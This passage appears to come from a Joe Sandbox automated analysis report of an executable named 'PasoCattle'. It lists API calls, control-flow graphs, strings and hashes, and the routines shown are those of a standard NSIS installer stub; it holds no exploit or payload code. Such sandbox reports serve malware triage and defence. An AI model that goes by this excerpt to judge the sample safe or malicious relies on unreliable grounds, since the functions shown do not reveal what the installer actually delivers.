                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                          Strings
                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                          • API String ID: 608394941-2746725676
                                                                                                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                          • API String ID: 4286501637-2478300759
                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                          Strings
                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                          • API String ID: 4283519449-527102705
                                                                                                                                                                          • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                          • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
